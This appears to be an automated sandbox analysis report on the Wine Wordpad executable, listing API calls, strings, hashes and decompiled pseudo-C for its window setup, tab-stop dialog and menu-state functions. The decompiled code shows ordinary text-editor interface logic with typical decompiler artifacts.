Part of subcall function 00401677: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000002,?,004013AB,?,00000000,?), ref: 00401693
Part of subcall function 00401677: GetLastError.KERNEL32(?,004013AB,?,00000000,?,?,?,?,?,?,?,-00000006), ref: 004016A0
Part of subcall function 00401677: MessageBoxW.USER32(-000006B1,Wine Wordpad,00000030), ref: 004016C0

SendMessageW.USER32(000000B8,00000000,00000000), ref: 00404E5D
lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,004012CC), ref: 00404E8B
lstrlenW.KERNEL32(00408C80,?,?,?,?,?,?,004012CC), ref: 00404E94
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,004012CC), ref: 00404E9D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,004012CC), ref: 00404EA4
wsprintfW.USER32 ref: 00404EB7
MessageBoxW.USER32(00000000,Wine Wordpad,00000033), ref: 00404ECE
GetProcessHeap.KERNEL32(00000000,00000000,?,?,004012CC), ref: 00404ED9
HeapFree.KERNEL32(00000000,?,?,004012CC), ref: 00404EE0

Strings

Wine Wordpad, xrefs: 00404EC2

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapMessage$lstrlen$ProcessSend$AllocCreateErrorFileFreeLastwsprintf
String ID: Wine Wordpad
API String ID: 3963976227-1917673877
Opcode ID: e4cf4f9b25f5e8143927941ad3b2703fafdb6f66f47bec7e5fb53d175addb2e8
Instruction ID: b705d266db3a211fdbffa1b6b26ab9378f61738de1a3ebcad21b6078aeb33861
Opcode Fuzzy Hash: e4cf4f9b25f5e8143927941ad3b2703fafdb6f66f47bec7e5fb53d175addb2e8
Instruction Fuzzy Hash: DB21B7B1540205AAD71067B4AE09F2B3A68E7C5754B16443FFB42B31E0DEB84C1896BD

Uniqueness

Uniqueness Score: -1.00%

Function 00402398, Relevance: 84.5, APIs: 37, Strings: 11, Instructions: 461
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402398(void* __edx, struct HWND__* _a4) {
				struct HWND__* _v8;
				void* _v12;
				struct HDC__* _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				signed int _v28;
				void* _v32;
				int _v36;
				int _v40;
				void* _v44;
				intOrPtr _v88;
				signed int _v92;
				int _v100;
				intOrPtr _v104;
				int _v108;
				struct HWND__* _v112;
				signed int _v136;
				intOrPtr _v140;
				void* _v144;
				int _v152;
				int _v160;
				struct tagRECT _v176;
				signed int _t89;
				struct HWND__* _t90;
				unsigned int _t118;
				struct HWND__* _t120;
				struct HWND__* _t124;
				void* _t127;
				struct HDC__* _t128;
				void* _t129;
				int* _t130;
				int* _t133;
				int _t138;
				struct HWND__* _t143;
				int _t144;
				int _t148;
				struct HWND__* _t165;
				struct HWND__* _t169;
				int _t177;
				struct HWND__* _t186;
				void* _t195;
				void* _t200;
				struct HWND__* _t201;
				struct HWND__* _t202;
				struct HWND__* _t204;
				struct HWND__* _t205;
				void* _t207;
				long _t208;
				struct HDC__* _t216;
				struct HWND__* _t218;
				void* _t221;
				intOrPtr* _t222;
				intOrPtr* _t226;

				_t200 = GetModuleHandleW(0);
				_v12 = _t200;
				CreateStatusWindowW(0x50000040, L"RichEdit text", _a4, 0x7d0);
				_t207 = CreateWindowExW(0x80, L"ReBarWindow32", 0, 0x56000241, 0x80000000, 0x80000000, 0, 0, _a4, 0x7d4, _t200, 0);
				_v40 = 0;
				_v36 = 0;
				_v8 = _t207;
				_v44 = 0xc;
				_t89 = SendMessageW(_t207, 0x404, 0,  &_v44);
				if(_t89 != 0) {
					_t90 = CreateToolbarEx(_t207, 0x5000010a, 0x7d2, 1, _t200, 0x64, 0, 0, 0x18, 0x18, 0x10, 0x10, 0x14);
					_v32 = _v32 | 0xffffffff;
					_t201 = _t90;
					_v28 = _v28 & 0x00000000;
					_t208 = SendMessageW(_t201, 0x413, 0,  &_v32);
					_t14 = _t208 + 6; // 0x6
					E004011B2(_t201, _t14, 0x3eb);
					_t15 = _t208 + 7; // 0x7
					E004011B2(_t201, _t15, 0x3e9);
					_t16 = _t208 + 8; // 0x8
					E004011B2(_t201, _t16, 0x3ea);
					E0040120A(_t201);
					_t17 = _t208 + 0xe; // 0xe
					E004011B2(_t201, _t17, 0x3f5);
					_t18 = _t208 + 9; // 0x9
					E004011B2(_t201, _t18, 0x3f3);
					_t222 = _t221 + 0x40;
					E0040120A(_t201);
					_t19 = _t208 + 0xc; // 0xc
					 *_t222 = 0x3f6;
					E004011B2();
					E0040120A(_t201);
					E004011B2(_t201, _t208, 0x51f);
					_t20 = _t208 + 1; // 0x1
					E004011B2(_t201, _t20, 0x51e);
					_t21 = _t208 + 2; // 0x2
					E004011B2(_t201, _t21, 0x520);
					_t22 = _t208 + 3; // 0x3
					E004011B2(_t201, _t22, 0x51b);
					_t23 = _t208 + 4; // 0x4
					E004011B2(_t201, _t23, 0x51c);
					E0040120A(_t201);
					E004011CA(_t201, 0, 0x640, 0);
					SendMessageW(_t201, 0x421, 0, 0);
					_t118 = SendMessageW(_t201, 0x43a, 0, 0);
					_t120 = CreateWindowExW(0, L"ComboBoxEx32", 0, 0x50800102, 0, 0, 0xc8, 0x96, _v8, 0x7dd, _v12, 0);
					_v20 = _t120;
					GetWindowRect(_t120,  &_v176);
					_v144 = 0x50;
					_v140 = 0x171;
					_t124 =  >  ? _t118 >> 0x10 : _v176.bottom - _v176.top;
					_v136 = 0x105;
					_v24 = _t124;
					_v104 = _t124;
					_v88 = _t124;
					_v100 = 0;
					_v112 = _t201;
					_v108 = 0;
					_v92 = 2;
					SendMessageW(_v8, 0x40a, 0xffffffff,  &_v144);
					_t202 = _v20;
					_t127 = SendMessageW(_t202, 0x31, 0, 0);
					_t128 = GetDC(_t202);
					_v16 = _t128;
					_t129 = SelectObject(_t128, _t127);
					_t130 =  &_v152;
					0x400000(_t130, _t201, _t19);
					GetTextExtentPointW(_v16, L"Times New Roman", _t130 - 1, L"Times New Roman");
					_t133 =  &_v160;
					0x400000(_t133);
					GetTextExtentPointW(_v16, L" 00", _t133 - 1, L" 00");
					_t216 = _v16;
					SelectObject(_t216, _t129);
					_t186 = _v20;
					ReleaseDC(_t186, _t216);
					_v112 = _t186;
					_t138 = MulDiv(_v152, 3, 2);
					_t204 = _v24;
					_v100 = _t138 + _t204;
					_v92 = 4;
					SendMessageW(_v8, 0x40a, 0xffffffff,  &_v144);
					_t143 = CreateWindowExW(0, L"ComboBoxEx32", 0, 0x50800002, 0, 0, 0x32, 0x96, _v8, 0x7de, _v12, 0);
					_v24 = _t143;
					_v112 = _t143;
					_t144 = MulDiv(_v160, 3, 2);
					_v136 = _v136 ^ 0x00000001;
					_t205 = _v8;
					_v100 = _t144 + _t204;
					_v92 = 5;
					SendMessageW(_t205, 0x40a, 0xffffffff,  &_v144);
					_push(0x14);
					_t148 = 0x10;
					_t218 = CreateToolbarEx(_t205, 0x1000010a, 0x7d3, 8, _v12, 0x65, 0, 0, _t148, _t148, _t148, _t148, ??);
					SendMessageW(_t218, 0x454, 0, 1);
					E004011CA(_t218, 0, 0x578, 0);
					E004011CA(_t218, 1, 0x579, 0);
					E004011CA(_t218, 2, 0x57a, 0);
					E004011CA(_t218, 3, 0x57b, 0);
					E0040120A(_t218);
					E004011CA(_t218, 4, 0x44c, 0);
					E004011CA(_t218, 5, 0x44d, 0);
					E004011CA(_t218, 6, 0x44e, 0);
					E0040120A(_t218);
					E004011CA(_t218, 7, 0x522, 8);
					_t226 = _t222 + 0xe8;
					SendMessageW(_t218, 0x421, 0, 0);
					_v112 = _t218;
					_v92 = 3;
					SendMessageW(_t205, 0x40a, 0xffffffff,  &_v144);
					_t165 = CreateWindowExW(0, L"Static", 0, 0x50000000, 0, 0, 0xc8, 0xa, _t205, 0x7df, _v12, 0);
					_v92 = _v92 & 0x00000000;
					_v136 = _v136 | 0x00000001;
					_v112 = _t165;
					SendMessageW(_t205, 0x40a, 0xffffffff,  &_v144);
					if(LoadLibraryW(L"RICHED20.DLL") == 0) {
						E004018DD(_a4, 0x6a7, L"Wine Wordpad", 0x30);
						_t226 = _t226 + 0x10;
						PostQuitMessage(1);
					}
					_t169 =  *0x40802c;
					if(_t169 != 0) {
						0x400000();
						SetFocus( *0x40802c);
						SendMessageW( *0x40802c, 0x445, 0, 0x80000);
						E0040502E();
						E00404AD7(_v20);
						E00404C59(_v24);
						_t195 = _t169;
						E004013B5(_t195);
						SendMessageW( *0x40802c, 0xb9, 0, 0);
						_t177 = RegisterWindowMessageW(L"commdlg_FindReplace");
						 *0x408038 = _t177;
						0x400000(_a4);
						 *_t226 = 0x40803c;
						0x400000(0x408044);
						0x400000();
						DragAcceptFiles(_a4, 1);
						return 0;
					} else {
						_t89 = E004040F0( *0x400000(GetLastError()), 2, "Error code %u\n");
						goto L1;
					}
				}
				L1:
				return _t89 | 0xffffffff;
			}

0x004023b5
0x004023c1
0x004023c4
0x004023f3
0x004023f5
0x004023fb
0x0040240c
0x0040240f
0x00402416
0x0040241a
0x00402442
0x00402448
0x0040244c
0x0040244e
0x00402460
0x00402467
0x0040246c
0x00402476
0x0040247b
0x00402485
0x0040248a
0x00402490
0x0040249a
0x0040249f
0x004024a9
0x004024ae
0x004024b3
0x004024b7
0x004024bc
0x004024bf
0x004024c8
0x004024ce
0x004024da
0x004024e4
0x004024e9
0x004024f3
0x004024f8
0x00402502
0x00402507
0x00402514
0x00402519
0x0040251f
0x0040252e
0x0040253e
0x00402548
0x00402575
0x00402581
0x00402586
0x0040259a
0x004025a4
0x004025ae
0x004025b1
0x004025bb
0x004025c0
0x004025c3
0x004025d7
0x004025da
0x004025dd
0x004025e0
0x004025e7
0x004025e9
0x004025f1
0x004025f6
0x00402604
0x00402607
0x0040260b
0x00402618
0x0040262a
0x0040262c
0x00402638
0x00402648
0x0040264a
0x0040264f
0x00402651
0x00402656
0x0040266c
0x0040266f
0x00402671
0x0040267c
0x00402690
0x00402697
0x004026bc
0x004026cc
0x004026cf
0x004026d2
0x004026d4
0x004026dd
0x004026e0
0x004026f2
0x004026f9
0x004026fb
0x004026ff
0x00402724
0x0040272c
0x00402738
0x00402747
0x00402756
0x00402765
0x0040276e
0x0040277d
0x0040278c
0x0040279b
0x004027a1
0x004027b0
0x004027b5
0x004027c2
0x004027ca
0x004027d5
0x004027de
0x00402801
0x00402807
0x0040280b
0x00402812
0x00402820
0x0040282f
0x00402840
0x00402845
0x0040284a
0x0040284a
0x00402850
0x00402857
0x0040287d
0x00402889
0x004028a2
0x004028a4
0x004028ad
0x004028b5
0x004028bb
0x004028bc
0x004028ce
0x004028d5
0x004028de
0x004028e3
0x004028e8
0x004028f4
0x004028fb
0x00402905
0x00000000
0x00402859
0x0040286f
0x00000000
0x00402874
0x00402857
0x0040241c
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 004023A7
CreateStatusWindowW.COMCTL32(50000040,RichEdit text,?,000007D0), ref: 004023C4
CreateWindowExW.USER32 ref: 004023ED
SendMessageW.USER32(00000000,00000404,00000000,?), ref: 00402416
CreateToolbarEx.COMCTL32(00000000,5000010A,000007D2,00000001,00000000,00000064,00000000,00000000,00000018,00000018,00000010,00000010,00000014), ref: 00402442
SendMessageW.USER32(00000000,00000413,00000000,000000FF), ref: 0040245E
SendMessageW.USER32(00000000,00000421,00000000,00000000), ref: 0040253E

Strings

RICHED20.DLL, xrefs: 00402822
commdlg_FindReplace, xrefs: 004028D0
Static, xrefs: 004027FB
00, xrefs: 00402633, 00402640
ComboBoxEx32, xrefs: 0040256F, 004026B6
Times New Roman, xrefs: 00402611, 00402617, 00402620
ReBarWindow32, xrefs: 004023E3
Wine Wordpad, xrefs: 00402833
P, xrefs: 0040259A
Error code %u, xrefs: 00402860
RichEdit text, xrefs: 004023B7

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMessageSend$Window$HandleModuleStatusToolbar
String ID: 00$ComboBoxEx32$Error code %u$P$RICHED20.DLL$ReBarWindow32$RichEdit text$Static$Times New Roman$Wine Wordpad$commdlg_FindReplace
API String ID: 903917145-3912831490
Opcode ID: 931c3db9c6ce3b0d4a6e3a6954598880b8de5f33b59b6415518e5750fa52aa13
Instruction ID: 81704e17f447ab9fc47f4dd7b2d714ba0df3631b0b7b93f173a4e87fd35cf395
Opcode Fuzzy Hash: 931c3db9c6ce3b0d4a6e3a6954598880b8de5f33b59b6415518e5750fa52aa13
Instruction Fuzzy Hash: 51E1B771940314BEFB21AB618C86FBF7A7CEF08B14F10412AFB05BA1D1D7B859408B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040531A, Relevance: 61.6, APIs: 33, Strings: 2, Instructions: 331
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040531A(void* __fp0, struct HWND__* _a4, char _a8, struct HWND__* _a12, struct HWND__* _a16) {
				long _v8;
				int _v142;
				intOrPtr _v164;
				void* _v168;
				void* _v520;
				void* _v1032;
				void* __ecx;
				void* _t74;
				void* _t81;
				void* _t90;
				struct HWND__* _t91;
				long _t92;
				void* _t104;
				void* _t105;
				struct HWND__* _t120;
				void* _t134;
				int _t136;
				void* _t138;
				struct HWND__* _t152;
				int _t154;
				struct HWND__* _t156;
				void* _t157;
				void* _t165;
				intOrPtr _t171;
				int _t175;
				struct HWND__* _t176;
				int _t177;
				signed int _t181;
				signed int _t183;
				signed int _t185;
				signed int _t187;
				struct HWND__* _t188;
				struct HWND__* _t189;
				void* _t192;

				_t209 = __fp0;
				_push(_t181);
				_t74 = _a8 - 0x110;
				if(_t74 == 0) {
					_t152 = GetDlgItem(_a4, 0x7dc);
					_v168 = 0x9c;
					_v164 = 0x10;
					SendMessageW( *0x40802c, 0x43d, 0,  &_v168);
					SendMessageW(_t152, 0x141, 0xfe, 0);
					_t183 = 0;
					if(0 >= _v142) {
						L42:
						_push(_t152);
						L43:
						SetFocus();
						L44:
						_t81 = 0;
						L45:
						return _t81;
					} else {
						goto L41;
					}
					do {
						L41:
						_push( *((intOrPtr*)(_t192 + _t183 * 4 - 0x88)));
						E00404561(_t157,  &_v1032);
						_pop(_t157);
						SendMessageW(_t152, 0x143, 0,  &_v1032);
						_t183 = _t183 + 1;
					} while (_t183 < _v142);
					goto L42;
				}
				if(_t74 != 1) {
					goto L44;
				}
				_t90 = (_a12 & 0x0000ffff) - 1;
				if(_t90 == 0) {
					_t91 = GetDlgItem(_a4, 0x7dc);
					_a16 = _t91;
					_t175 = 0;
					_v168 = 0x9c;
					_v164 = 0x10;
					_t154 = 0;
					_t92 = SendMessageW(_t91, 0x148, 0,  &_v1032);
					_t185 = _t181 | 0xffffffff;
					if(_t92 == _t185) {
						L38:
						_v142 = _t154;
						SendMessageW( *0x40802c, 0x447, _t175,  &_v168);
						L39:
						EndDialog(_a4, _a12);
						_t81 = 1;
						goto L45;
					}
					_t176 = _a16;
					while(_t154 < 0x20) {
						E004044E2( &_v1032, _t209,  &_v1032,  &_a16,  &_a8);
						asm("movss xmm0, [ebp+0x14]");
						asm("movss [esp], xmm0");
						 *((intOrPtr*)(_t192 + _t154 * 4 - 0x88)) = E00405747(_a8);
						_t154 = _t154 + 1;
						if(SendMessageW(_t176, 0x148, _t154,  &_v1032) != _t185) {
							continue;
						}
						break;
					}
					_t175 = 0;
					goto L38;
				}
				_t104 = _t90 - 1;
				if(_t104 == 0) {
					goto L39;
				}
				_t105 = _t104 - 0x62;
				if(_t105 == 0) {
					_t152 = GetDlgItem(_a4, 0x7dc);
					GetWindowTextW(_t152,  &_v520, 0xff);
					lstrcatW( &_v520, 0x406340);
					lstrcatW( &_v520, 0x408e80);
					_t187 = lstrcatW | 0xffffffff;
					if(SendMessageW(_t152, 0x158, lstrcatW,  &_v520) != lstrcatW) {
						goto L42;
					}
					_a12 = _a12 & 0x00000000;
					_t177 = 0;
					_v8 = SendMessageW(_t152, 0x146, 0, 0);
					if(E004044E2( &_v520, __fp0,  &_v520,  &_a12,  &_a16) != 0) {
						_t171 = _v8;
						if(_t171 < 0x20) {
							asm("movss xmm0, [ebp+0x10]");
							asm("movss [esp], xmm0");
							_a8 = 0xbf800000;
							_t120 = E00405747(_a16);
							_a12 = _t120;
							_a4 = 0;
							_t165 = _t157;
							if(_t171 <= 0) {
								L31:
								if(_t120 != _t187) {
									_push(_t120);
									E00404561(_t165,  &_v520);
									SendMessageW(_t152, 0x14a, _a4,  &_v520);
									SetWindowTextW(_t152, _t177);
								}
								goto L42;
							} else {
								goto L28;
							}
							while(1) {
								L28:
								SendMessageW(_t152, 0x148, _t177,  &_v520);
								E004044E2( &_v520, _t209,  &_v520,  &_a8,  &_a16);
								asm("movss xmm0, [ebp+0xc]");
								asm("movss [esp], xmm0");
								_t187 = E00405747(_a16);
								_t120 = _a12;
								_pop(_t165);
								if(_t120 <= _t187) {
									break;
								}
								_t177 = _t177 + 1;
								if(_t177 < _v8) {
									continue;
								}
								break;
							}
							_a4 = _t177;
							_t177 = 0;
							goto L31;
						}
						_push(0x40);
						_push(L"Wine Wordpad");
						_push(0x6b0);
						L26:
						_push(_a4);
						E004018DD();
						goto L42;
					}
					_push(0x40);
					_push(L"Wine Wordpad");
					_push(0x6a9);
					goto L26;
				}
				_t134 = _t105 - 1;
				if(_t134 == 0) {
					_t188 = GetDlgItem(_a4, 0x7dc);
					_t136 = SendMessageW(_t188, 0x147, 0, 0);
					if(_t136 != 0xffffffff) {
						SendMessageW(_t188, 0x144, _t136, 0);
					}
					goto L44;
				}
				_t138 = _t134 - 1;
				if(_t138 == 0) {
					_t189 = GetDlgItem(_a4, 0x7dc);
					SendMessageW(_t189, 0x14b, 0, 0);
					_push(_t189);
					goto L43;
				} else {
					if(_t138 == 0x776) {
						_a12 = GetDlgItem(_a4, 0x64);
						_t156 = GetDlgItem(_a4, 0x65);
						_a4 = GetDlgItem(_a4, 0x66);
						if(GetWindowTextLengthW(_a16) == 0) {
							_push(0);
						} else {
							_push(1);
						}
						EnableWindow(_a12, ??);
						if(SendMessageW(_a16, 0x146, 0, 0) == 0) {
							_push(0);
							_push(_a4);
						} else {
							EnableWindow(_a4, 1);
							if(SendMessageW(_a16, 0x147, 0, 0) != 0xffffffff) {
								_push(1);
							} else {
								_push(0);
							}
							_push(_t156);
						}
						EnableWindow();
					}
					goto L44;
				}
			}

0x0040531a
0x00405327
0x00405329
0x0040532e
0x004056ba
0x004056c2
0x004056cf
0x004056e5
0x004056f3
0x004056f7
0x00405700
0x00405737
0x00405737
0x00405738
0x00405738
0x0040573e
0x0040573e
0x00405740
0x00405744
0x00000000
0x00000000
0x00000000
0x00405702
0x00405702
0x00405702
0x00405710
0x00405716
0x00405725
0x00405732
0x00405733
0x00000000
0x00405702
0x00405337
0x00000000
0x00000000
0x00405343
0x00405346
0x004055e2
0x004055ee
0x004055f2
0x004055f4
0x00405605
0x0040560f
0x00405611
0x00405617
0x0040561c
0x00405672
0x00405678
0x0040568c
0x00405692
0x00405698
0x004056a0
0x00000000
0x004056a0
0x0040561e
0x00405621
0x00405635
0x0040563a
0x00405641
0x00405650
0x0040565e
0x0040566e
0x00000000
0x00000000
0x00000000
0x0040566e
0x00405670
0x00000000
0x00405670
0x0040534c
0x0040534f
0x00000000
0x00000000
0x00405355
0x00405358
0x0040546e
0x0040547d
0x00405495
0x004054a3
0x004054ab
0x004054be
0x00000000
0x00000000
0x004054c4
0x004054c8
0x004054d8
0x004054f4
0x00405504
0x0040550a
0x00405528
0x0040552e
0x00405536
0x0040553d
0x00405542
0x00405545
0x00405549
0x0040554c
0x004055a0
0x004055a2
0x004055a8
0x004055b0
0x004055c7
0x004055cf
0x004055cf
0x00000000
0x00000000
0x00000000
0x00000000
0x0040554e
0x0040554e
0x0040555c
0x00405571
0x00405576
0x0040557d
0x0040558a
0x0040558c
0x00405590
0x00405593
0x00000000
0x00000000
0x00405595
0x00405599
0x00000000
0x00000000
0x00000000
0x00405599
0x0040559b
0x0040559e
0x00000000
0x0040559e
0x0040550c
0x0040550e
0x00405513
0x00405518
0x00405518
0x0040551b
0x00000000
0x00405520
0x004054f6
0x004054f8
0x004054fd
0x00000000
0x004054fd
0x0040535e
0x00405361
0x0040543e
0x00405446
0x0040544b
0x00405459
0x00405459
0x00000000
0x0040544b
0x00405367
0x0040536a
0x00405410
0x0040541a
0x00405420
0x00000000
0x00405370
0x00405375
0x0040538d
0x00405397
0x0040539e
0x004053b1
0x004053b7
0x004053b3
0x004053b3
0x004053b3
0x004053bb
0x004053cf
0x004053f5
0x004053f6
0x004053d1
0x004053d6
0x004053eb
0x004053f1
0x004053ed
0x004053ed
0x004053ed
0x004053ee
0x004053ee
0x004053f9
0x004053f9
0x00000000
0x00405375

APIs

GetDlgItem.USER32 ref: 00405386
GetDlgItem.USER32 ref: 00405390
GetDlgItem.USER32 ref: 00405399
GetWindowTextLengthW.USER32(?), ref: 004053A1
EnableWindow.USER32(?,00000000), ref: 004053BB
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 004053C7
EnableWindow.USER32(?,00000001), ref: 004053D6
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053E2
EnableWindow.USER32(?,00000000), ref: 004053F9
GetDlgItem.USER32 ref: 00405408
SendMessageW.USER32(00000000,0000014B,00000000,00000000), ref: 0040541A
GetDlgItem.USER32 ref: 0040542E
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00405446
SendMessageW.USER32(00000000,00000144,00000000,00000000), ref: 00405459
GetDlgItem.USER32 ref: 00405468
GetWindowTextW.USER32 ref: 0040547D
lstrcatW.KERNEL32(?,00406340), ref: 00405495
lstrcatW.KERNEL32(?,00408E80), ref: 004054A3
SendMessageW.USER32(00000000,00000158,74B482B0,?), ref: 004054B6
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 004054D2
SendMessageW.USER32(00000000,00000148,00000000,?), ref: 0040555C
SendMessageW.USER32(00000000,0000014A,?,?), ref: 004055C7
SetWindowTextW.USER32(00000000,00000000), ref: 004055CF
GetDlgItem.USER32 ref: 004055E2
SendMessageW.USER32(00000000,00000148,00000000,?), ref: 00405611
SendMessageW.USER32(?,00000148,00000000,?), ref: 00405666
SendMessageW.USER32(00000447,00000000,0000009C), ref: 0040568C
EndDialog.USER32(?,?), ref: 00405698
GetDlgItem.USER32 ref: 004056AE
SendMessageW.USER32(0000043D,00000000,?), ref: 004056E5
SendMessageW.USER32(00000000,00000141,000000FE,00000000), ref: 004056F3
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00405725
SetFocus.USER32(00000000), ref: 00405738

Strings

, xrefs: 00405621
Wine Wordpad, xrefs: 004054F8, 0040550E

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item$Window$EnableText$lstrcat$DialogFocusLength
String ID: $Wine Wordpad
API String ID: 1997333349-1719699334
Opcode ID: 93f7e200c1bcf7ab2fc0a995a96f5780f6d8b288669b65904f1ad45676d57a46
Instruction ID: e865f459428cbb7ea3ede72e8584c08c40025923a2fe482a5f6332a20c03719e
Opcode Fuzzy Hash: 93f7e200c1bcf7ab2fc0a995a96f5780f6d8b288669b65904f1ad45676d57a46
Instruction Fuzzy Hash: B9B1C0B2900209BBDB219F21DD48E9B3BBCEF45710F014036FA09BA1E1DB758A51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00402912, Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 293
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402912(struct HWND__* _a4, int _a8) {
				struct HWND__* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				void* _v32;
				struct tagMENUITEMINFOW _v80;
				signed short _v212;
				void* _v228;
				signed char _v232;
				void* _v236;
				struct HWND__* _t57;
				unsigned int _t67;
				signed int _t71;
				void* _t106;
				signed int _t107;
				void* _t111;
				signed int _t112;
				signed int _t116;
				signed int _t120;
				void* _t124;
				int _t128;
				int _t137;
				signed int _t143;
				void* _t146;
				void* _t148;
				void* _t150;
				void* _t153;
				void* _t155;
				void* _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				signed int _t166;
				signed int _t168;
				signed int _t169;
				signed int _t171;
				struct HMENU__* _t172;
				long _t176;

				_v8 = GetDlgItem(_a4, 0x7d1);
				_t57 = GetDlgItem(_a4, 0x7d0);
				_v12 = _v12 | 0xffffffff;
				_v24 = _t57;
				SendMessageW( *0x40802c, 0xb0,  &_v16,  &_v20);
				_t172 = _a8;
				EnableMenuItem(_t172, 0x51e, 0 | _v16 == _v20);
				EnableMenuItem(_t172, 0x51f, 0 | _v16 == _v20);
				_v236 = 0x9c;
				_t137 = 0;
				SendMessageW(_v8, 0x43d, 0,  &_v236);
				_t67 = GetWindowLongW(_v8, 0xfffffff0);
				_t143 = 8;
				CheckMenuItem(_t172, 0x516, _t67 >> 0x00000008 & _t143);
				_t71 = SendMessageW(_v8, 0xb8, 0, 0);
				asm("sbb eax, eax");
				CheckMenuItem(_t172, 0x517,  ~_t71 & 0x00000008);
				if((_v232 & 0x00000008) != 0) {
					_v12 = _v212 & 0x0000ffff;
				}
				_t146 = 8;
				_t76 =  ==  ? _t146 : 0;
				CheckMenuItem(_t172, 0x44c,  ==  ? _t146 : 0);
				_push(3);
				_t148 = 8;
				_t79 =  ==  ? _t148 : 0;
				CheckMenuItem(_t172, 0x44d,  ==  ? _t148 : 0);
				_push(2);
				_t150 = 8;
				_t82 =  ==  ? _t150 : 0;
				CheckMenuItem(_t172, 0x44e,  ==  ? _t150 : 0);
				_t153 = 8;
				_t85 =  ==  ? _t153 : 0;
				CheckMenuItem(_t172, 0x523,  ==  ? _t153 : 0);
				_push(2);
				_t155 = 8;
				_t88 =  ==  ? _t155 : 0;
				CheckMenuItem(_t172, 0x524,  ==  ? _t155 : 0);
				_push(3);
				_t157 = 8;
				_t91 =  ==  ? _t157 : 0;
				CheckMenuItem(_t172, 0x525,  ==  ? _t157 : 0);
				_t158 = 8;
				_t94 =  ==  ? _t158 : 0;
				CheckMenuItem(_t172, 0x526,  ==  ? _t158 : 0);
				_t159 = 8;
				_t97 =  ==  ? _t159 : 0;
				CheckMenuItem(_t172, 0x527,  ==  ? _t159 : 0);
				_t160 = 8;
				_t100 =  ==  ? _t160 : 0;
				CheckMenuItem(_t172, 0x528,  ==  ? _t160 : 0);
				EnableMenuItem(_t172, 0x51b, 0 | SendMessageW(_v8, 0xc6, _t137, _t137) == 0x00000000);
				EnableMenuItem(_t172, 0x51c, 0 | SendMessageW(_v8, 0x455, _t137, _t137) == 0x00000000);
				_t106 = 2;
				_t107 = E00404398(_t106, _t106);
				_t166 = 8;
				asm("sbb eax, eax");
				CheckMenuItem(_t172, 0x5dc,  ~_t107 & _t166);
				_t111 = 3;
				_t112 = E00404398(_t111, _t111);
				_t168 = 8;
				asm("sbb eax, eax");
				CheckMenuItem(_t172, 0x5dd,  ~_t112 & _t168);
				_t116 = IsWindowVisible(_v24);
				_t169 = 8;
				asm("sbb eax, eax");
				_t120 = E00404398(CheckMenuItem(_t172, 0x5de,  ~_t116 & _t169), _t137);
				asm("sbb eax, eax");
				_t171 = 8;
				CheckMenuItem(_t172, 0x5df,  ~_t120 & _t171);
				_t124 = 8;
				_v32 = _t124;
				_v28 = 0x4b0;
				_t176 = SendMessageW( *0x40802c, 0x45f,  &_v32, _t137);
				_t128 = 0 | _t176 == 0x00000000;
				_a8 = _t128;
				EnableMenuItem(_t172, 0x3f6, _t128);
				_v80.cbSize = 0x30;
				_v80.fMask = 0x20;
				GetMenuItemInfoW(_t172, 0x3f7, _t137,  &_v80);
				if(_t176 == 0 || _v80.dwItemData == _t137) {
					_t137 = 1;
				}
				EnableMenuItem(_t172, 0x3f7, _t137);
				EnableMenuItem(_t172, 0x3f8, _a8);
				return 0;
			}

0x00402936
0x00402939
0x0040293b
0x0040293f
0x00402955
0x00402963
0x00402976
0x0040298a
0x00402992
0x0040299d
0x004029a8
0x004029b3
0x004029bb
0x004029c8
0x004029d8
0x004029e0
0x004029ec
0x004029f9
0x00402a02
0x00402a02
0x00402a0f
0x00402a10
0x00402a1a
0x00402a20
0x00402a2a
0x00402a2b
0x00402a35
0x00402a3b
0x00402a45
0x00402a46
0x00402a50
0x00402a64
0x00402a65
0x00402a6f
0x00402a75
0x00402a83
0x00402a84
0x00402a8e
0x00402a94
0x00402aa2
0x00402aa3
0x00402aad
0x00402abf
0x00402ac0
0x00402aca
0x00402adc
0x00402add
0x00402ae7
0x00402af9
0x00402afa
0x00402b04
0x00402b28
0x00402b48
0x00402b4c
0x00402b4e
0x00402b5e
0x00402b5f
0x00402b6a
0x00402b6e
0x00402b70
0x00402b7a
0x00402b7b
0x00402b86
0x00402b8b
0x00402b95
0x00402b96
0x00402ba4
0x00402bac
0x00402bb0
0x00402bba
